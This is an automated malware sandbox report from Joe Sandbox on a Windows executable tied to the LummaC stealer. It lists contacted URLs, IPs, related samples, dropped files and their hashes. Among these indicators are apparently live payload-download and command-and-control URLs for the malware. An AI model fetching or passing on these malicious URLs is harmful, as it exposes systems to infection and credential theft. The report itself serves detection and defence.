                                  http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWAREsqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                    high
                                    https://post-to-me.com/track_prt.php?sub=sqJIHyPqhr.exefalse
                                      high
                                      http://crl.microE093.tmp.exe, 00000004.00000003.2580762347.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.0000000000A43000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEf6sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://rapeflowwj.lat/apiNE093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://rapeflowwj.lat/YE093.tmp.exe, 00000004.00000002.2679025621.00000000009C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://rapeflowwj.lat/apisE093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://post-to-me.com/sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://rapeflowwj.lat/api1E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://176.113.115.19/ScreenUpdateSync.exeysqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://rapeflowwj.lat/apipE093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://176.113.115.19/sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          172.67.179.207
                                          post-to-me.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.67.220.223
                                          rapeflowwj.latUnited States
                                          13335CLOUDFLARENETUStrue
                                          176.113.115.19
                                          unknownRussian Federation
                                          49505SELECTELRUfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1577877
                                          Start date and time:2024-12-18 20:54:21 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 14s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:sqJIHyPqhr.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:fc0ff134aa4c7a6c02f3d502eb17a1d4.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@4/7@2/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 41
                                          • Number of non-executed functions: 336
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 172.202.163.200, 20.190.177.20, 4.245.163.56, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: sqJIHyPqhr.exe
                                          TimeTypeDescription
                                          14:55:38API Interceptor8673182x Sleep call for process: sqJIHyPqhr.exe modified
                                          14:55:47API Interceptor2x Sleep call for process: E093.tmp.exe modified
                                          14:55:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          172.67.179.207InstallSetup.exeGet hashmaliciousLummaCBrowse
                                            wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                              TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                  EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                    ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                      6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                        IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                          XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                            0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                              172.67.220.223InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                176.113.115.19InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19/ScreenUpdateSync.exe
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                rapeflowwj.latInstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.220.223
                                                                ScreenUpdateSync.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.24.223
                                                                post-to-me.comInstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.179.207
                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.179.207
                                                                AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.179.207
                                                                XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.56.70
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSk6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.21.99
                                                                https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.26.6.189
                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.75.163
                                                                http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                • 172.66.0.227
                                                                g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 162.159.61.3
                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.75.163
                                                                https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                • 104.16.123.96
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                • 172.67.131.246
                                                                https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=Get hashmaliciousUnknownBrowse
                                                                • 104.16.79.73
                                                                CLOUDFLARENETUSk6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.21.99
                                                                https://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.26.6.189
                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.75.163
                                                                http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                • 172.66.0.227
                                                                g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 162.159.61.3
                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.75.163
                                                                https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                • 104.16.123.96
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                • 172.67.131.246
                                                                https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=Get hashmaliciousUnknownBrowse
                                                                • 104.16.79.73
                                                                SELECTELRUhttps://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                • 82.202.242.100
                                                                2.png.ps1Get hashmaliciousUnknownBrowse
                                                                • 176.113.115.178
                                                                1.png.ps1Get hashmaliciousUnknownBrowse
                                                                • 176.113.115.178
                                                                GO.png.ps1Get hashmaliciousUnknownBrowse
                                                                • 176.113.115.178
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 176.113.115.178
                                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19
                                                                hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19
                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19
                                                                he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19
                                                                wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                • 176.113.115.19
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.220.223
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                • 172.67.220.223
                                                                'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 172.67.220.223
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.220.223
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                • 172.67.220.223
                                                                F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                • 172.67.220.223
                                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                • 172.67.220.223
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                • 172.67.220.223
                                                                0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                • 172.67.220.223
                                                                37f463bf4616ecd445d4a1937da06e19solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.207
                                                                List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 172.67.179.207
                                                                g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 172.67.179.207
                                                                solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.207
                                                                Setup.msiGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.207
                                                                InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                • 172.67.179.207
                                                                T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.207
                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • 172.67.179.207
                                                                z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                • 172.67.179.207
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\E093.tmp.exeInstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exeInstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9708416190378537
                                                                    Encrypted:false
                                                                    SSDEEP:96:Ln6WVQd+Sslhr372fhQXIDcQPc6ENcEWcw3t+HbHg/8BRTf3Oy1E45WAU6NCUtWD:z6MS40RgNsOju3mmzuiFkZ24IO8h
                                                                    MD5:C3D294BF3C34BBAF73989C0BDAAE7398
                                                                    SHA1:E0ABB4A34E95663D9990BC85B71B651DDDE5C860
                                                                    SHA-256:16B051CB6585C1A905FB758445068C88E1D1E5162E2237AAA31BE6957433C08B
                                                                    SHA-512:6776700562C60FDBB9FC13E3CD0F2146E7DF2650EF3F2180B1CA6409BC88F9FDF85CC5562EF4D74561FDB5F528862C00420FD566182C970B3B0B32FE756549B7
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.2.5.3.4.9.2.7.9.2.7.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.2.5.3.4.9.8.1.0.5.1.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.8.9.0.4.b.f.-.6.0.5.4.-.4.d.9.f.-.a.c.8.1.-.d.6.d.9.e.f.f.5.e.8.1.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.f.6.9.1.4.1.-.2.2.f.6.-.4.6.b.d.-.9.2.0.f.-.c.9.2.b.a.a.9.f.3.0.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.0.9.3...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.c.-.0.0.0.1.-.0.0.1.4.-.8.0.f.0.-.5.4.d.1.8.6.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.7.9.e.c.2.e.6.7.1.0.2.3.2.6.8.1.1.8.a.2.c.b.7.c.c.d.a.c.e.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.1.7.d.a.5.4.9.8.5.6.f.d.1.c.b.8.8.7.6.d.6.a.a.9.7.f.2.0.4.f.4.6.e.4.2.a.2.f.e.!.E.0.9.3...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 19:55:49 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):45316
                                                                    Entropy (8bit):2.545427150948013
                                                                    Encrypted:false
                                                                    SSDEEP:192:EiFXoH/h4IIpfZOx1Bg6fQHnpVsSLmz2/myityI+X0uPQ4KAeX:YHxIuTBdfQHPG8R9PQ49eX
                                                                    MD5:198FB6943C03605D81412B64EB88815B
                                                                    SHA1:B90E1CBE71F6536FAC21C5AD10BD27188810AA59
                                                                    SHA-256:9D4BC8EC980474CB3F2FDBBF8B0343C4DF9BD2387FDF5F7D24FCA8533650FB6F
                                                                    SHA-512:B1E4928E225378E60278EE7F8DA90C1DE0F4906FE7BC5FA3F024B7058BA3F6BC5113E9F0D411C4839DA0D47A273B4E6908E7F922D29E646F01F0616732B19E6F
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:MDMP..a..... ........(cg............4...............H.......<...........t....,..........`.......8...........T............?...q..........P...........< ..............................................................................eJ....... ......GenuineIntel............T............(cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8282
                                                                    Entropy (8bit):3.700467696358428
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJM76096YSX6jegmfgCnEpDG89bJrsfVDm:R6lXJQ6e6Ya66gmfgCGJwf8
                                                                    MD5:ECCA51F942491DB43B6DB3B7072B69B1
                                                                    SHA1:F4AC92A64B9DC210B0FD3A5FB3AB0C3E3B2B9FA7
                                                                    SHA-256:EA22FE5808BFB66C11E75A8B793E931D8CABE875680D848BB1215A62C36E0C80
                                                                    SHA-512:9ED695BA92D6E3E282F007C986D9709B8AC6F482AE3A64B200D90171593824DABEEF5EE031B7DAFE3E6982C3E64DB76CEF8054595497C48CE9E3B72C3268274A
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.3.6.<./.P.i.
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4565
                                                                    Entropy (8bit):4.44604482192978
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsGJg77aI9kPWpW8VYSYm8M4JhKEUZFz+q8qbp6+njDzMed:uIjfcI7ue7VSJgLnjDzMed
                                                                    MD5:A6FD7569F1094AD1184711AB241F8417
                                                                    SHA1:6C7AEC862258D42342DCB7B139860281543778AD
                                                                    SHA-256:C96B13DB5D81AF9DDDA3FED9F2207DDE689FC4BB883FD6740570524AC38B4EB0
                                                                    SHA-512:EC35D26B89452CB3D74614C7E78CDBD1330369D370156C75755465F6CD6953F9CD1E7682D7A87DB4180125884984E57C9EE5D20DD267E3C0354B64A46380C689
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="637138" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                    Process:C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):368128
                                                                    Entropy (8bit):6.68436511005947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
                                                                    MD5:9026F04B1266851659FB62C91BD7F2F3
                                                                    SHA1:917DA549856FD1CB8876D6AA97F204F46E42A2FE
                                                                    SHA-256:174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
                                                                    SHA-512:B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                    Joe Sandbox View:
                                                                    • Filename: InstallSetup.exe, Detection: malicious, Browse
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):368128
                                                                    Entropy (8bit):6.68436511005947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:+3UTQTn7pm2PUwOIvILi6xeyyFz8iO5TwdZ1:+3kQTn1DPwGhyyFz8iowL1
                                                                    MD5:9026F04B1266851659FB62C91BD7F2F3
                                                                    SHA1:917DA549856FD1CB8876D6AA97F204F46E42A2FE
                                                                    SHA-256:174076F434B961EA67DF0480E823246754FAED86EB69B37DD49D7774DDE0113D
                                                                    SHA-512:B10108A3BCE0D25551E4442BC3E97B61DC84AD58E3DF821792534EB56BEE9E36ADD44984C6C22902098E439413B9C838CC40D9D0E29F3A934DC37BD866D4D38B
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                    Joe Sandbox View:
                                                                    • Filename: InstallSetup.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wB.A3#..3#..3#...lK.2#..-qY.-#..-qH.'#..-q^.]#.....6#..3#..@#..-qW.2#..-qI.2#..-qL.2#..Rich3#..........PE..L...Xg_e.....................*?...................@..........................0C..............................................(..<.....B..............................................................................................................text............................... ..`.rdata...!......."..................@..@.data.....=..@...p..................@....rsrc.........B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1835008
                                                                    Entropy (8bit):4.568448729876847
                                                                    Encrypted:false
                                                                    SSDEEP:6144:qoPefZnQMa3tfL9bn90foomgsattlbSldrUHT7hSgkSNv0juQJYchUJvTGAlBsLn:nPZAooVJHnsg/d1TTqG6
                                                                    MD5:6ACDEB4ADEEA0F72C5C17F8D9FEED208
                                                                    SHA1:1F154F86F75A29F6D809904CCE653E6FED2E63BF
                                                                    SHA-256:9CA883B4472B8D48CDAF3DA2EF0D26F3CFEE0845925DC8D8A031D4C4C20165F6
                                                                    SHA-512:B9D5976264A4A302B6E4AEFF0E7C576F71AA10A2442BDB2681B1BEB6E4CDDA2962258F266DE634A28CF45F3F13BDC68C89C4ADE7B310321B1A4B0FA7C0E1F278
                                                                    Malicious:false
                                                                    Preview:regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^..Q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.017370463528963
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:sqJIHyPqhr.exe
                                                                    File size:437'248 bytes
                                                                    MD5:fc0ff134aa4c7a6c02f3d502eb17a1d4
                                                                    SHA1:c8a08842839e36ddc3811f3c3f78951dda942c43
                                                                    SHA256:ede8801434d59328105f4af419b459a3c5d6c60195cbe8c718bbc529607ddc61
                                                                    SHA512:a7f7c5029802621c81edfd409e444c6854c7d819ca598fd87ce3821ef6cbb601c9c0183677c4a2c2b47184cd0759ed336012fc679a63ffd93ff4349332542419
                                                                    SSDEEP:6144:aYW0yoiMGGmHV8+tlYjanM1TGQoe9WSdsdkus85X0A6C9+gXKTwduftyc:aYcMGGLIlpM1TkSUk3CGI5Kwsftyc
                                                                    TLSH:DE94E01165F2A535F7F38A357935EA945A7BB873AE31818E2758131F0E30392CE22717
